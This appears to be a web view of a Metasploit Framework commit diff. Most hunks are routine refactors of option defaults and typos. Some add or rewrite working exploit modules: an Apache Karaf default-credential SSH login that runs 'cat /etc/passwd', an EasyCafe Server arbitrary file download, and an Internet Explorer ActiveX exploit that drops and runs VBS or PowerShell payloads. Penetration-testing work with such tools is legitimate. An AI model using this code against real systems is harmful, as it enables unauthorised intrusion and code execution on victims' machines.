specified file does not exist.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'R-73eN', # Vulnerability Discovery
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39102' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(831),
|
||||
OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def get_file
|
||||
res = sock.get_once
|
||||
unless res
|
||||
print_error("Unable to retrieve file due to a timeout.")
|
||||
return
|
||||
end
|
||||
|
||||
unless res.length == 261
|
||||
print_error("Received a response of an invalid size.")
|
||||
return
|
||||
end
|
||||
|
||||
file_size = res.unpack('@256V')[0]
|
||||
contents = ''
|
||||
while contents.length < file_size
|
||||
contents << sock.get_once
|
||||
end
|
||||
|
||||
print_status("File retrieved successfully (#{contents.length} bytes)!")
|
||||
contents
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
file_path = datastore['FILEPATH']
|
||||
if file_path.length > 67
|
||||
print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
|
||||
return
|
||||
end
|
||||
|
||||
packet = "\x43"
|
||||
packet << file_path
|
||||
packet << "\x00" * (255 - file_path.length)
|
||||
packet << "\x01\x00\x00\x00\x01"
|
||||
|
||||
vprint_status("Sending request (#{packet.length} bytes)")
|
||||
connect
|
||||
sock.put(packet)
|
||||
|
||||
contents = get_file
|
||||
disconnect
|
||||
return if contents.nil?
|
||||
|
||||
path = store_loot(
|
||||
'easycafe_server',
|
||||
'application/octet-stream',
|
||||
ip,
|
||||
contents,
|
||||
File.basename(file_path)
|
||||
)
|
||||
print_status("File saved in: #{path}")
|
||||
end
|
||||
end
|
|
@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
if (not mssql_login_datastore)
|
||||
if !mssql_login_datastore
|
||||
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
|
||||
return
|
||||
end
|
||||
|
|
|
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
if (not mssql_login_datastore)
|
||||
if !mssql_login_datastore
|
||||
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
|
||||
return
|
||||
end
|
||||
|
|
|
@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1'
|
||||
}
|
||||
))
|
||||
register_options(
|
||||
|
|
|
@ -37,12 +37,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]),
|
||||
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false'])
|
||||
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false'])
|
||||
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
|
||||
OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -408,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
subdirs.shift
|
||||
end
|
||||
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true
|
||||
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles']
|
||||
end
|
||||
unless detailed_tbl.rows.empty?
|
||||
if datastore['LogSpider'] == '1'
|
||||
|
|
|
@ -0,0 +1,133 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/ssh'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Apache Karaf Default Credentials Command Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.
|
||||
The 'karaf' user has a known default password, which can be used to login to the
|
||||
SSH service, and execute operating system commands from remote.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Nicholas Starke <nick@alephvoid.com>'
|
||||
],
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
['Apache Karaf', {}],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => "Feb 9 2016",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8101),
|
||||
OptString.new('USERNAME', [true, 'Username', 'karaf']),
|
||||
OptString.new('PASSWORD', [true, 'Password', 'karaf']),
|
||||
OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])
|
||||
], self.class
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
Opt::Proxies,
|
||||
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
|
||||
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def rport
|
||||
datastore['RPORT']
|
||||
end
|
||||
|
||||
def username
|
||||
datastore['USERNAME']
|
||||
end
|
||||
|
||||
def password
|
||||
datastore['PASSWORD']
|
||||
end
|
||||
|
||||
def cmd
|
||||
datastore['CMD']
|
||||
end
|
||||
|
||||
def do_login(user, pass, ip)
|
||||
opts = {
|
||||
:auth_methods => ['password'],
|
||||
:msframework => framework,
|
||||
:msfmodule => self,
|
||||
:port => rport,
|
||||
:disable_agent => true,
|
||||
:config => false,
|
||||
:password => pass,
|
||||
:record_auth_info => true,
|
||||
:proxies => datastore['Proxies']
|
||||
}
|
||||
|
||||
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
|
||||
|
||||
begin
|
||||
ssh = nil
|
||||
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
|
||||
ssh = Net::SSH.start(ip, user, opts)
|
||||
end
|
||||
rescue OpenSSL::Cipher::CipherError => e
|
||||
print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})")
|
||||
return
|
||||
rescue Rex::ConnectionError
|
||||
return
|
||||
rescue Net::SSH::Disconnect, ::EOFError
|
||||
print_error "#{ip}:#{rport} SSH - Disconnected during negotiation"
|
||||
return
|
||||
rescue ::Timeout::Error
|
||||
print_error "#{ip}:#{rport} SSH - Timed out during negotiation"
|
||||
return
|
||||
rescue Net::SSH::AuthenticationFailed
|
||||
print_error "#{ip}:#{rport} SSH - Failed authentication"
|
||||
rescue Net::SSH::Exception => e
|
||||
print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}"
|
||||
return
|
||||
end
|
||||
|
||||
if ssh
|
||||
print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'")
|
||||
else
|
||||
print_error "#{ip}:#{rport} - Unknown error"
|
||||
end
|
||||
ssh
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
print_status("#{ip}:#{rport} - Attempt to login...")
|
||||
ssh = do_login(username, password, ip)
|
||||
if ssh
|
||||
output = ssh.exec!("shell:exec #{cmd}\n").to_s
|
||||
if output
|
||||
print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}")
|
||||
store_loot("apache.karaf.command",
|
||||
"text/plain",
|
||||
ip,
|
||||
output)
|
||||
vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command")
|
||||
else
|
||||
print_error "#{ip}:#{rport} - Command failed to execute"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
|
||||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 09 2016',
|
||||
'DisclosureDate' => 'Jan 9 2016',
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
ssh_opts = {
|
||||
port: datastore['RPORT'],
|
||||
port: rport,
|
||||
auth_methods: ['fortinet-backdoor']
|
||||
}
|
||||
|
||||
|
|
|
@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(69),
|
||||
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
|
||||
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
|
||||
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -52,7 +52,7 @@ class MetasploitModule < Msf::Encoder
|
|||
register_options(
|
||||
[
|
||||
OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]),
|
||||
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ])
|
||||
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false])
|
||||
],
|
||||
self.class)
|
||||
end
|
||||
|
@ -179,10 +179,8 @@ class MetasploitModule < Msf::Encoder
|
|||
raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set."
|
||||
end
|
||||
|
||||
protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true"
|
||||
|
||||
# with everything set up, we can now call the encoding routine
|
||||
state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload)
|
||||
state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect'])
|
||||
|
||||
state.buf = ""
|
||||
state.decoder_stub
|
||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 300, #5 minutes
|
||||
'DisablePayloadHandler' => 'false',
|
||||
'DisablePayloadHandler' => false,
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
|
|
|
@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' => {
|
||||
'RPORT' => 443,
|
||||
'SSL' => true,
|
||||
'SSLVersion' => 'TLS1'
|
||||
},
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
|
|
|
@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if res.body =~ /Set Default Options for #{printer_name}/
|
||||
vprint_good("Added printer successfully")
|
||||
delete_printer(printer_name)
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
|
||||
vprint_error("Authentication failed")
|
||||
elsif res.code == 426
|
||||
vprint_error("SSL required - set SSL true")
|
||||
|
@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
|
||||
elsif res.body =~ /Set Default Options for #{printer_name}/
|
||||
print_good("Added printer successfully")
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
|
||||
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
|
||||
elsif res.code == 426
|
||||
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
|
||||
|
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
|
||||
elsif res.body =~ /Test page sent; job ID is/
|
||||
vprint_good("Added test page to printer queue")
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
|
||||
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
|
||||
elsif res.code == 426
|
||||
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
|
||||
|
@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
|
||||
elsif res.body =~ /has been deleted successfully/
|
||||
print_status("Deleted printer '#{printer_name}' successfully")
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
|
||||
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
|
||||
vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.")
|
||||
elsif res.code == 426
|
||||
vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
|
||||
|
|
|
@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
|
||||
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
|
||||
print_error('Target seems safe, so we will not continue.')
|
||||
return
|
||||
end
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary code execution backdoor
|
||||
placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
|
||||
placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']),
|
||||
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]),
|
||||
], self.class)
|
||||
register_autofilter_ports([ 50013 ])
|
||||
end
|
||||
|
|
|
@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# msf/core/exploit/http/server.rb
|
||||
#
|
||||
def start_http(opts={})
|
||||
# Ensture all dependencies are present before initializing HTTP
|
||||
# Ensure all dependencies are present before initializing HTTP
|
||||
use_zlib
|
||||
|
||||
comm = datastore['ListenerComm']
|
||||
|
@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# set.
|
||||
#
|
||||
def use_zlib
|
||||
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
|
||||
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
|
||||
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
|
||||
if b
|
||||
return b.captures[0]
|
||||
elsif datastore['HTTP::chunked'] == true
|
||||
elsif datastore['HTTP::chunked']
|
||||
b = /chunked Transfer-Encoding forbidden/.match(res.body)
|
||||
if b
|
||||
fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
|
||||
|
|
|
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
|
||||
if b
|
||||
return b.captures[0]
|
||||
elsif datastore['HTTP::chunked'] == true
|
||||
elsif datastore['HTTP::chunked']
|
||||
b = /chunked Transfer-Encoding forbidden/.match(res.body)
|
||||
if b
|
||||
fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
|
||||
|
|
|
@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n";
|
|||
end
|
||||
|
||||
def exploit
|
||||
if datastore['DESTRUCTIVE'] == true
|
||||
if datastore['DESTRUCTIVE']
|
||||
exploit_destructive
|
||||
else
|
||||
exploit_nondestructive
|
||||
|
|
|
@ -8,16 +8,26 @@ require 'msf/util/exe'
|
|||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
VULN_CHECK_JS = %Q|
|
||||
try {
|
||||
new ActiveXObject("WScript.Shell");
|
||||
new ActiveXObject("Scripting.FileSystemObject");
|
||||
is_vuln = true;
|
||||
} catch(e) {}
|
||||
|
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
|
||||
'Description' => %q{
|
||||
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
|
||||
'Description' => %q{
|
||||
This exploit takes advantage of the "Initialize and script ActiveX controls not
|
||||
marked safe for scripting" setting within Internet Explorer. When this option is set,
|
||||
IE allows access to the WScript.Shell ActiveX control, which allows javascript to
|
||||
|
@ -36,43 +46,77 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
|
||||
an x64 iexplore.exe.
|
||||
|
||||
By default, this module will not attempt to fire against IEs that come with Protected
|
||||
Mode enabled by default, because it can trigger a security prompt. However, if you are
|
||||
feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT
|
||||
datastore option to true.
|
||||
},
|
||||
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'natron',
|
||||
'Ben Campbell' # PSH and remove ADODB.Stream
|
||||
],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://support.microsoft.com/kb/182569' ],
|
||||
[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
|
||||
[ 'URL', 'http://support.microsoft.com/kb/870669']
|
||||
],
|
||||
'DisclosureDate' => 'Sep 20 2010',
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'DisclosureDate' => 'Sep 20 2010',
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' => {
|
||||
source: 'script',
|
||||
os_name: OperatingSystems::Match::WINDOWS,
|
||||
ua_name: HttpClients::IE,
|
||||
vuln_test: VULN_CHECK_JS,
|
||||
vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.'
|
||||
},
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
|
||||
[ 'Windows x86/x64', {} ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'HTTP::compression' => 'gzip'
|
||||
},
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
|
||||
OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]),
|
||||
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
# Unfortunately we don't currently have an explicit way to check whether Protected Mode is
|
||||
# actually enabled or not, so we can only rely on whatever is default on the OS. This should
|
||||
# allow BAP2 to always fire without worrying about the prmopt popping up, but the user can
|
||||
# still ignore this by setting ALLOWPROMPT to true in standalone mode.
|
||||
def has_protected_mode_prompt?(browser)
|
||||
if datastore['ALLOWPROMPT']
|
||||
return false
|
||||
elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name]
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, browser)
|
||||
if has_protected_mode_prompt?(browser)
|
||||
print_warning("This target possibly has Protected Mode, exploit aborted.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
# Build out the HTML response page
|
||||
var_shellobj = rand_text_alpha(rand(5)+5)
|
||||
var_shellobj = rand_text_alpha(rand(5)+5)
|
||||
|
||||
p = regenerate_payload(cli)
|
||||
if datastore['TECHNIQUE'] == 'VBS'
|
||||
|
@ -92,10 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def vbs_technique(var_shellobj, p)
|
||||
var_fsobj = rand_text_alpha(rand(5)+5)
|
||||
var_fsobj_file = rand_text_alpha(rand(5)+5)
|
||||
var_vbsname = rand_text_alpha(rand(5)+5)
|
||||
var_writedir = rand_text_alpha(rand(5)+5)
|
||||
var_fsobj = rand_text_alpha(rand(5)+5)
|
||||
var_fsobj_file = rand_text_alpha(rand(5)+5)
|
||||
var_vbsname = rand_text_alpha(rand(5)+5)
|
||||
var_writedir = rand_text_alpha(rand(5)+5)
|
||||
|
||||
exe = generate_payload_exe({ :code => p.encoded })
|
||||
vbs = Msf::Util::EXE.to_exe_vbs(exe)
|
||||
|
@ -103,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Build the javascript that will be served
|
||||
js_content = %Q|
|
||||
//<html><head></head><body><script>
|
||||
<html><head></head><body><script>
|
||||
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
|
||||
var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
|
||||
|
@ -114,20 +158,20 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
|
|||
|
||||
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
|
||||
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
|
||||
//</script></html>
|
||||
</script></html>
|
||||
|
|
||||
return js_content
|
||||
js_content
|
||||
end
|
||||
|
||||
def psh_technique(var_shellobj, p)
|
||||
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
|
||||
js_content = %Q|
|
||||
//<html><head></head><body><script>
|
||||
<html><head></head><body><script>
|
||||
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
|
||||
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
|
||||
//</script></html>
|
||||
</script></html>
|
||||
|
|
||||
|
||||
return js_content
|
||||
js_content
|
||||
end
|
||||
end
|
||||
|
|
|
@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'false',
|
||||
'DisablePayloadHandler' => false,
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Payload' =>
|
||||
|
|
|
@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'false',
|
||||
'DisablePayloadHandler' => false,
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Payload' =>
|
||||
|
|
|
@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
register_evasion_options(
|
||||
[
|
||||
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
|
||||
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def generate_space
|
||||
if datastore['PlaylistSpaceInjection'] == true
|
||||
if datastore['PlaylistSpaceInjection']
|
||||
return rand_text(rand(100)+1, nil, " \t")
|
||||
else
|
||||
return ''
|
||||
|
|
|
@ -334,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
msg.to = datastore['MAILTO']
|
||||
msg.from = datastore['MAILFROM']
|
||||
|
||||
if datastore['HTML'] == true
|
||||
if datastore['HTML']
|
||||
body = create_email_body_html(datastore['MESSAGE'], msg.subject)
|
||||
content_type = "text/html; charset=\"iso-8859-1\""
|
||||
msg.add_part(body, content_type, 'quoted-printable')
|
||||
|
|
|
@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
|
|
@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
'DisablePayloadHandler' => true,
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue